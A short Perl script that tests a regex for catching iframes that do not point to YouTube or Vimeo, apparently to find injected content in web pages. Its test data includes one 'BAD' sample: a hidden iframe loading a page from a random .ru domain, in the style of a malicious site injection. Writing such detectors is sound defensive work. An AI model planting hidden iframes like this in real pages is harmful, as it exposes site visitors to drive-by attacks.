use strict;
my $str = 'Good:
<p> </p>
<p><iframe width="560" height="315" src="https://www.youtube.com/embed/UYHjyNNy_4Y" frameborder="0" allowfullscreen></iframe></p>
<p>asdasda </p>
Good:
<p> </p>
<p><iframe src="https://player.vimeo.com/video/75781782?badge=0" width="500" height="281" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen></iframe> <p><a href="https://vimeo.com/75781782">Keloid</a> from <a href="https://vimeo.com/biglazyrobot">BLR_VFX</a> on <a href="https://vimeo.com">Vimeo</a>.</p></p>
<p>asdasda </p>
Norm:
<p> </p>
<p><iframe width="560" height="315" src="https://www.1youtube.com/embed/UYHjyNNy_4Y" frameborder="0" allowfullscreen></iframe></p>
<p>asdasda </p>
BAD:
<p> </p>
<p><iframe id="a1996667054" style="display: none;" src="https://al9l235gkc7d.ru/f.html"></iframe></p>
<p>asdasda </p>
';
my $regex = qr/(?:<iframe\s((?!src)[^=]*="[^"]*"\s){0,3}src="(?:https|http):\/\/(?!www.youtube.com\/|youtube.com\/|player.vimeo.com\/)[^"]*"[^>]*>.*?<\/iframe>)/misp;
if ( $str =~ /$regex/g ) {
print "Whole match is ${^MATCH} and its start/end positions can be obtained via \$-[0] and \$+[0]\n";
# print "Capture Group 1 is $1 and its start/end positions can be obtained via \$-[1] and \$+[1]\n";
# print "Capture Group 2 is $2 ... and so on\n";
}
# ${^POSTMATCH} and ${^PREMATCH} are also available with the use of '/p'
# Named capture groups can be called via $+{name}